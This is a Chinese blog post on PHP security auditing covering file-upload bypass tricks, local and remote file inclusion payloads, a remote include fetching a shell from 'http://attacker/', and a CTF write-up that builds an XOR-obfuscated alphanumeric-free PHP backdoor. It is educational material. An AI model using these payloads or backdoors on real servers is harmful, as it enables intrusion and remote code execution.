

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="https://pic1.imgdb.cn/item/6891f04e58cb8da5c806dce6.jpg">
  <link rel="icon" href="https://pic1.imgdb.cn/item/6891f04e58cb8da5c806dce6.jpg">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="suny">
  <meta name="keywords" content="">
  
    <meta name="description" content="文件上传漏洞绕过上传检查 前端检查扩展名 抓包绕过即可。  Content-Type 检测文件类型 抓包修改 Content-Type 类型，使其符合白名单规则。  服务端添加后缀 尝试 %00 截断。  服务端扩展名检测 利用解析漏洞。  Apache 解析 Apache 对后缀解析是从右向左的 phpshell.php.rar.rar.rar.rar 因为 Apache 不认识 .rar 这个">
<meta property="og:type" content="article">
<meta property="og:title" content="PHP代码审计">
<meta property="og:url" content="https://www.sunynov.top/2025/11/08/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/index.html">
<meta property="og:site_name" content="suny">
<meta property="og:description" content="文件上传漏洞绕过上传检查 前端检查扩展名 抓包绕过即可。  Content-Type 检测文件类型 抓包修改 Content-Type 类型，使其符合白名单规则。  服务端添加后缀 尝试 %00 截断。  服务端扩展名检测 利用解析漏洞。  Apache 解析 Apache 对后缀解析是从右向左的 phpshell.php.rar.rar.rar.rar 因为 Apache 不认识 .rar 这个">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://pic1.imgdb.cn/item/690c233e3203f7be00db6444.png">
<meta property="article:published_time" content="2025-11-08T13:59:32.000Z">
<meta property="article:modified_time" content="2026-01-11T01:52:56.427Z">
<meta property="article:author" content="suny">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://pic1.imgdb.cn/item/690c233e3203f7be00db6444.png">
  
  
  
  <title>PHP代码审计 - suny</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  




  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"www.sunynov.top","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":true,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  

  

  

  

  

  



  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>suny</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>首页</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>归档</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>分类</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>标签</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>关于</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/links/" target="_self">
                <i class="iconfont icon-link-fill"></i>
                <span>友链</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('https://pic.imgdb.cn/item/62c579525be16ec74a579b15.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="PHP代码审计"></span>
          
        </div>

        
          
  <div class="mt-3">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-author" aria-hidden="true"></i>
        suny
      </span>
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2025-11-08 21:59" pubdate>
          2025年11月8日 晚上
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          3.7k 字
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          31 分钟
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">PHP代码审计</h1>
            
              <p id="updated-time" class="note note-info" style="">
                
                  
                    本文最后更新于 2026年1月11日 上午
                  
                
              </p>
            
            
              <div class="markdown-body">
                
                <h2 id="文件上传漏洞"><a href="#文件上传漏洞" class="headerlink" title="文件上传漏洞"></a>文件上传漏洞</h2><h4 id="绕过上传检查"><a href="#绕过上传检查" class="headerlink" title="绕过上传检查"></a>绕过上传检查</h4><ul>
<li><p>前端检查扩展名</p>
<p>抓包绕过即可。</p>
</li>
<li><p><code>Content-Type</code> 检测文件类型</p>
<p>抓包修改 <code>Content-Type</code> 类型，使其符合白名单规则。</p>
</li>
<li><p>服务端添加后缀</p>
<p>尝试 <code>%00</code> 截断。</p>
</li>
<li><p>服务端扩展名检测</p>
<p>利用解析漏洞。</p>
</li>
<li><p>Apache 解析</p>
<p>Apache 对后缀解析是从右向左的</p>
<p><code>phpshell.php.rar.rar.rar.rar</code> 因为 Apache 不认识 <code>.rar</code> 这个文件类型，所以会一直遍历后缀到 <code>.php</code>，然后认为这是一个 PHP 文件。</p>
</li>
<li><p>IIS 解析</p>
<p>IIS 6 下当文件名为 <code>abc.asp;xx.jpg</code> 时，会将其解析为 <code>abc.asp</code>。</p>
</li>
<li><p>PHP CGI 路径解析</p>
<p>当访问 <code>http://www.a.com/path/test.jpg/notexist.php</code> 时，会将 <code>test.jpg</code> 当做 PHP 解析， <code>notexist.php</code> 是不存在的文件。此时 Nginx 的配置如下</p>
<figure class="highlight nginx"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs nginx"><span class="hljs-section">location</span> <span class="hljs-regexp">~ \.php$</span> &#123;<br>  <span class="hljs-attribute">root</span> html;<br>  <span class="hljs-attribute">fastcgi_pass</span> <span class="hljs-number">127.0.0.1:9000</span>;<br>  <span class="hljs-attribute">fastcgi_index</span> index.php;<br>  <span class="hljs-attribute">fastcgi_param</span> SCRIPT_FILENAME /scripts<span class="hljs-variable">$fastcgi_script_name</span>;<br>  <span class="hljs-attribute">include</span> fastcgi_param;<br>&#125;<br></code></pre></td></tr></table></figure>
</li>
<li><p>其他方式</p>
<p>后缀大小写、双写、特殊后缀如 <code>php5</code> 等，修改包内容的大小写过 WAF 等。</p>
</li>
</ul>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_59598029/article/details/138793923">文件上传漏洞（全网最详细）</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46684578/article/details/119141109">文件上传之 .htaccess文件getshell</a></p>
<p><a target="_blank" rel="noopener" href="https://blog.csdn.net/lza20001103/article/details/124427171">文件上传漏洞之MIME type验证原理和绕过</a></p>
<h2 id="文件包含漏洞"><a href="#文件包含漏洞" class="headerlink" title="文件包含漏洞"></a>文件包含漏洞</h2><p>常见的导致文件包含的函数有：</p>
<ul>
<li>PHP：<code>include()</code>，<code>include_once()</code>，<code>require()</code>，<code>require_once()</code>，<code>fopen()</code>，<code>readfile()</code> 等</li>
<li>JSP Servlet：<code>ava.io.File()</code>，<code>java.io.FileReader()</code> 等</li>
<li>ASP：<code>includefile</code>，<code>includevirtual</code> 等</li>
</ul>
<p>当 PHP 包含一个文件时，会将该文件当做 PHP 代码执行，而不会在意文件时什么类型。</p>
<h4 id="本地文件包含"><a href="#本地文件包含" class="headerlink" title="本地文件包含"></a>本地文件包含</h4><p>本地文件包含，Local File Inclusion，LFI。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$file</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;file&#x27;</span>];<br><span class="hljs-keyword">if</span> (<span class="hljs-title function_ invoke__">file_exists</span>(<span class="hljs-string">&#x27;/home/wwwrun/&#x27;</span>.<span class="hljs-variable">$file</span>.<span class="hljs-string">&#x27;.php&#x27;</span>)) &#123;<br>  <span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;/home/wwwrun/&#x27;</span>.<span class="hljs-variable">$file</span>.<span class="hljs-string">&#x27;.php&#x27;</span>;<br>&#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>上述代码存在本地文件包含，可用 %00 截断的方式读取 <code>/etc/passwd</code> 文件内容。</p>
<ul>
<li><p><code>%00</code> 截断</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">?<span class="hljs-keyword">file</span>=..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/etc/</span>passwd%<span class="hljs-number">00</span><br></code></pre></td></tr></table></figure>

<p>需要 <code>magic_quotes_gpc=off</code>，PHP 小于 5.3.4 有效。</p>
</li>
<li><p>路径长度截断</p>
<figure class="highlight gradle"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs gradle">?<span class="hljs-keyword">file</span>=..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/../</span>..<span class="hljs-regexp">/etc/</span>passwd<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/.[…]/</span>.<span class="hljs-regexp">/./</span>.<span class="hljs-regexp">/./</span>./.<br></code></pre></td></tr></table></figure>

<p>Linux 需要文件名长于 4096，Windows 需要长于 256。</p>
</li>
</ul>
<h4 id="远程文件包含"><a href="#远程文件包含" class="headerlink" title="远程文件包含"></a>远程文件包含</h4><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">if</span> (<span class="hljs-variable">$route</span> == <span class="hljs-string">&quot;share&quot;</span>) &#123;<br>  <span class="hljs-keyword">require_once</span> <span class="hljs-variable">$basePath</span> . <span class="hljs-string">&quot;/action/m_share.php&quot;</span>;<br>&#125; <span class="hljs-keyword">elseif</span> (<span class="hljs-variable">$route</span> == <span class="hljs-string">&quot;sharelink&quot;</span>) &#123;<br>  <span class="hljs-keyword">require_once</span> <span class="hljs-variable">$basePath</span> . <span class="hljs-string">&quot;/action/m_sharelink.php&quot;</span>;<br>&#125;<br></code></pre></td></tr></table></figure>

<p>构造变量 <code>basePath</code> 的值。</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">/?basePath=http:/</span><span class="hljs-regexp">/attacker/</span>phpshell.txt?<br></code></pre></td></tr></table></figure>

<p>最终的代码执行了</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-keyword">require_once</span> <span class="hljs-string">&quot;http://attacker/phpshell.txt?/action/m_share.php&quot;</span>;<br></code></pre></td></tr></table></figure>

<p>问号后的部分被解释为 URL 的 querystring，这也是一种「截断」。</p>
<p><img src="https://pic1.imgdb.cn/item/693d6f5ffe7cfeca3822eec5.png" srcset="/img/loading.gif" lazyload></p>
<p><a target="_blank" rel="noopener" href="https://konwait12.github.io/my-kon-blog/posts/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/"><strong>PHP伪协议详解</strong></a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xinghaihe/p/18416524">本地文件包含漏洞详解与CTF实战 </a></p>
<p><a href="/html/taishan.html">伪协议过滤绕过</a></p>
<h2 id="RCE"><a href="#RCE" class="headerlink" title="RCE"></a>RCE</h2><h3 id="直接执行代码"><a href="#直接执行代码" class="headerlink" title="直接执行代码"></a>直接执行代码</h3><p>PHP 中有不少可以直接执行代码的函数。</p>
<figure class="highlight scss"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs scss"><span class="hljs-built_in">eval</span>();<br><span class="hljs-built_in">assert</span>();<br><span class="hljs-built_in">system</span>();<br><span class="hljs-built_in">exec</span>();<br><span class="hljs-built_in">shell_exec</span>();<br><span class="hljs-built_in">passthru</span>();<br><span class="hljs-built_in">escapeshellcmd</span>();<br><span class="hljs-built_in">pcntl_exec</span>();<br>......<br></code></pre></td></tr></table></figure>

<h3 id="preg-replace-代码执行"><a href="#preg-replace-代码执行" class="headerlink" title="preg_replace() 代码执行"></a><code>preg_replace()</code> 代码执行</h3><p><code>preg_replace()</code> 的第一个参数如果存在 <code>/e</code> 模式修饰符，则允许代码执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$var</span> = <span class="hljs-string">&quot;&lt;tag&gt;phpinfo()&lt;/tag&gt;&quot;</span>;<br><span class="hljs-title function_ invoke__">preg_replace</span>(<span class="hljs-string">&quot;/&lt;tag&gt;(.*?)&lt;\/tag&gt;/e&quot;</span>, <span class="hljs-string">&quot;addslashes(\\1)&quot;</span>, <span class="hljs-variable">$var</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>如果没有 <code>/e</code> 修饰符，可以尝试 %00 截断。</p>
<h3 id="preg-match-代码执行"><a href="#preg-match-代码执行" class="headerlink" title="preg_match 代码执行"></a><code>preg_match</code> 代码执行</h3><p><code>preg_match</code> 执行的是匹配正则表达式，如果匹配成功，则允许代码执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;flag.php&#x27;</span>;<br><span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;code&#x27;</span>]))&#123;<br>    <span class="hljs-variable">$code</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;code&#x27;</span>];<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">strlen</span>(<span class="hljs-variable">$code</span>)&gt;<span class="hljs-number">40</span>)&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;Long.&quot;</span>);<br>    &#125;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">preg_match</span>(<span class="hljs-string">&quot;/[A-Za-z0-9]+/&quot;</span>,<span class="hljs-variable">$code</span>))&#123;<br>        <span class="hljs-keyword">die</span>(<span class="hljs-string">&quot;NO.&quot;</span>);<br>    &#125;<br>    @<span class="hljs-keyword">eval</span>(<span class="hljs-variable">$code</span>);<br>&#125;<span class="hljs-keyword">else</span>&#123;<br>    <span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-keyword">__FILE__</span>);<br>&#125;<br><span class="hljs-comment">//$hint =  &quot;php function getFlag() to get flag&quot;;</span><br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<details>
<summary>点击这里展开详细内容</summary>
<p>这道题是 <code>xman</code> 训练赛的时候，梅子酒师傅出的一道题。这一串代码描述是这样子，我们要绕过 <code>A-Z</code>、<code>a-z</code>、<code>0-9</code> 这些常规数字、字母字符串的传参，将非字母、数字的字符经过各种变换，最后能构造出 <code>a-z</code> 中任意一个字符，并且字符串长度小于 <code>40</code> 。然后再利用 <code>PHP</code> 允许动态函数执行的特点，拼接出一个函数名，这里我们是 <code>getFlag</code>，然后动态执行该代码即可。</p>
<p>那么，我们需要考虑的问题是如何通过各种变换，使得我们能够去成功读取到 <code>getFlag</code> 函数，然后拿到 <code>webshell</code> 。</p>
<p>在理解这个之前，我们首先需要大家了解的是 <code>PHP</code> 中异或 <code>^</code> 的概念。</p>
<p>我们先看一下下面这段代码：</p>
<pre><code class="hljs">&lt;?php
    echo &quot;A&quot;^&quot;?&quot;;
?&gt;
</code></pre>
<p>运行结果如下：</p>
<p><img src="https://ctf-wiki.org/web/php/figure/preg_match/answer1.png" srcset="/img/loading.gif" lazyload></p>
<p>我们可以看到，输出的结果是字符 <code>~</code>。之所以会得到这样的结果，是因为代码中对字符 <code>A</code> 和字符 <code>?</code> 进行了异或操作。在 <code>PHP</code> 中，两个变量进行异或时，先会将字符串转换成 <code>ASCII</code> 值，再将 <code>ASCII</code> 值转换成二进制再进行异或，异或完，又将结果从二进制转换成了 <code>ASCII</code> 值，再将 <code>ASCII</code> 值转换成字符串。异或操作有时也被用来交换两个变量的值。</p>
<p>比如像上面这个例子</p>
<p><code>A</code> 的 <code>ASCII</code> 值是 <code>65</code> ，对应的二进制值是 <code>01000001</code></p>
<p><code>?</code> 的ASCII值是 <code>63</code> ，对应的二进制值是 <code>00111111</code></p>
<p>异或的二进制的值是 <code>‭01111110‬</code> ，对应的 <code>ASCII</code> 值是 <code>126</code> ，对应的字符串的值就是 <code>~</code> 了</p>
<p>我们都知道， <code>PHP</code> 是弱类型的语言，也就是说在 <code>PHP</code> 中我们可以不预先声明变量的类型，而直接声明一个变量并进行初始化或赋值操作。正是由于 <code>PHP</code> 弱类型的这个特点，我们对 <code>PHP</code> 的变量类型进行隐式的转换，并利用这个特点进行一些非常规的操作。如将整型转换成字符串型，将布尔型当作整型，或者将字符串当作函数来处理，下面我们来看一段代码：</p>
<pre><code class="hljs">&lt;?php
    function B()&#123;
        echo &quot;Hello Angel_Kitty&quot;;
    &#125;
    $_++;
    $__= &quot;?&quot; ^ &quot;&#125;&quot;;
    $__();
?&gt;
</code></pre>
<p>代码执行结果如下：</p>
<p><img src="https://ctf-wiki.org/web/php/figure/preg_match/answer2.png" srcset="/img/loading.gif" lazyload></p>
<p>我们一起来分析一下上面这段代码：</p>
<p>1、<code>$_++;</code> 这行代码的意思是对变量名为 <code>&quot;_&quot;</code> 的变量进行自增操作，在 <code>PHP</code> 中未定义的变量默认值 <code>null</code> ，<code>null==false==0</code> ，我们可以在不使用任何数字的情况下，通过对未定义变量的自增操作来得到一个数字。</p>
<p>2、<code>$__=&quot;?&quot; ^ &quot;&#125;&quot;;</code> 对字符 <code>?</code> 和 <code>&#125;</code> 进行异或运算，得到结果 <code>B</code> 赋给变量名为 <code>__</code> (两个下划线)的变量</p>
<p>3、<code>$ __ ();</code> 通过上面的赋值操作，变量 <code>$__</code> 的值为 <code>B</code> ，所以这行可以看作是 <code>B()</code> ，在 <code>PHP</code> 中，这行代码表示调用函数 <code>B</code> ，所以执行结果为 <code>Hello Angel_Kitty</code> 。在 <code>PHP</code> 中，我们可以将字符串当作函数来处理。</p>
<p>看到这里，相信大家如果再看到类似的 <code>PHP</code> 后门应该不会那么迷惑了，你可以通过一句句的分析后门代码来理解后门想实现的功能。</p>
<p>我们希望使用这种后门创建一些可以绕过检测的并且对我们有用的字符串，如 <code>_POST</code> ， <code>system</code> ， <code>call_user_func_array</code>，或者是任何我们需要的东西。</p>
<p>下面是个非常简单的非数字字母的 <code>PHP</code> 后门：</p>
<pre><code class="hljs">&lt;?php
    @$_++; // $_ = 1
    $__=(&quot;#&quot;^&quot;|&quot;); // $__ = _
    $__.=(&quot;.&quot;^&quot;~&quot;); // _P
    $__.=(&quot;/&quot;^&quot;`&quot;); // _PO
    $__.=(&quot;|&quot;^&quot;/&quot;); // _POS
    $__.=(&quot;&#123;&quot;^&quot;/&quot;); // _POST 
    $&#123;$__&#125;[!$_]($&#123;$__&#125;[$_]); // $_POST[0]($_POST[1]);
?&gt;
</code></pre>
<p>在这里我说明下， <code>.=</code> 是字符串的连接，具体参看 <code>PHP</code> 语法</p>
<p>我们甚至可以将上面的代码合并为一行，从而使程序的可读性更差，代码如下：</p>
<pre><code class="hljs">$__=(&quot;#&quot;^&quot;|&quot;).(&quot;.&quot;^&quot;~&quot;).(&quot;/&quot;^&quot;`&quot;).(&quot;|&quot;^&quot;/&quot;).(&quot;&#123;&quot;^&quot;/&quot;);
</code></pre>
<p>我们回到 <code>xman</code> 训练赛的那题来看，我们的想法是通过构造异或来去绕过那串字符，那么我们该如何构造这个字串使得长度小于 <code>40</code> 呢？</p>
<p>我们最终是要读取到那个 <code>getFlag</code> 函数，我们需要构造一个 <code>_GET</code> 来去读取这个函数，我们最终构造了如下字符串：</p>
<p><img src="https://ctf-wiki.org/web/php/figure/preg_match/payloads.png" srcset="/img/loading.gif" lazyload></p>
<p>可能很多小伙伴看到这里仍然无法理解这段字符串是如何构造的吧，我们就对这段字符串进行段分析。</p>
<h4>构造 <code>_GET</code> 读取</h4>
<p>首先我们得知道 <code>_GET</code> 由什么异或而来的，经过我的尝试与分析，我得出了下面的结论：</p>
<pre><code class="hljs">&lt;?php
    echo &quot;`&#123;&#123;&#123;&quot;^&quot;?&lt;&gt;/&quot;;//_GET
?&gt;
</code></pre>
<p>这段代码一大坨是啥意思呢？因为40个字符长度的限制，导致以前逐个字符异或拼接的webshell不能使用。<br/>这里可以使用php中可以执行命令的反引号 <code>`</code> 和 <code>Linux</code> 下面的通配符 <code>?</code></p>
<ul>
<li><code>?</code> 代表匹配一个字符</li>
<li><code>`</code> 表示执行命令</li>
<li><code>&quot;</code> 对特殊字符串进行解析</li>
    <p>由于 <code>?</code> 只能匹配一个字符，这种写法的意思是循环调用，分别匹配。我们将其进行分解来看：</p>
<pre><code class="hljs">&lt;?php
    echo &quot;&#123;&quot;^&quot;&lt;&quot;;
?&gt;
</code></pre>
<p>输出结果为：</p>
<p><img src="https://ctf-wiki.org/web/php/figure/preg_match/answer3.png" srcset="/img/loading.gif" lazyload></p>
<pre><code class="hljs">&lt;?php
    echo &quot;&#123;&quot;^&quot;&gt;&quot;;
?&gt;
</code></pre>
<p>输出结果为：</p>
<p><img src="https://ctf-wiki.org/web/php/figure/preg_match/answer4.png" srcset="/img/loading.gif" lazyload></p>
<pre><code class="hljs">&lt;?php
    echo &quot;&#123;&quot;^&quot;/&quot;;
?&gt;
</code></pre>
<p>输出结果为：</p>
<p><img src="https://ctf-wiki.org/web/php/figure/preg_match/answer5.png" srcset="/img/loading.gif" lazyload></p>
<p>所以我们可以知道， <code>_GET</code> 就是这么被构造出来的啦！</p>
<h4>获取 <code>_GET</code> 参数</h4>
<p>我们又该如何获取 <code>_GET</code> 参数呢？咱们可以构造出如下字串：</p>
<pre><code class="hljs">&lt;?php
    echo $&#123;$_&#125;[_]($&#123;$_&#125;[__]);//$_GET[_]($_GET[__])
?&gt;
</code></pre>
<p>根据前面构造的来看， <code>$_</code> 已经变成了 <code>_GET</code> 。顺理成章的来讲， <code>$_ = _GET</code> 。我们构建 <code>$_GET[__]</code> 是为了要获取参数值。</p>
<h4>传入参数</h4>
<p>此时我们只需要去调用 <code>getFlag</code> 函数获取 <code>webshell</code> 就好了，构造如下：</p>
<pre><code class="hljs">&lt;?php
    echo $_=getFlag;//getFlag
?&gt;
</code></pre>
<p>所以把参数全部连接起来，就可以了。</p>
<p><img src="https://ctf-wiki.org/web/php/figure/preg_match/payloads.png" srcset="/img/loading.gif" lazyload></p>
<p>结果如下：</p>
<p><img src="https://ctf-wiki.org/web/php/figure/preg_match/flag.png" srcset="/img/loading.gif" lazyload></p>
<p>于是我们就成功地读取到了flag！</p></details>



<h3 id="动态函数执行"><a href="#动态函数执行" class="headerlink" title="动态函数执行"></a>动态函数执行</h3><p>用户自定义的函数可以导致代码执行。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-variable">$dyn_func</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;dyn_func&quot;</span>];<br><span class="hljs-variable">$argument</span> = <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&quot;argument&quot;</span>];<br><span class="hljs-variable">$dyn_func</span>(<span class="hljs-variable">$argument</span>);<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="反引号命令执行"><a href="#反引号命令执行" class="headerlink" title="反引号命令执行"></a>反引号命令执行</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-keyword">echo</span> `ls -al`;<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<h3 id="Curly-Syntax"><a href="#Curly-Syntax" class="headerlink" title="Curly Syntax"></a>Curly Syntax</h3><p>PHP 的 Curly Syntax 也能导致代码执行，它将执行花括号间的代码，并将结果替换回去。</p>
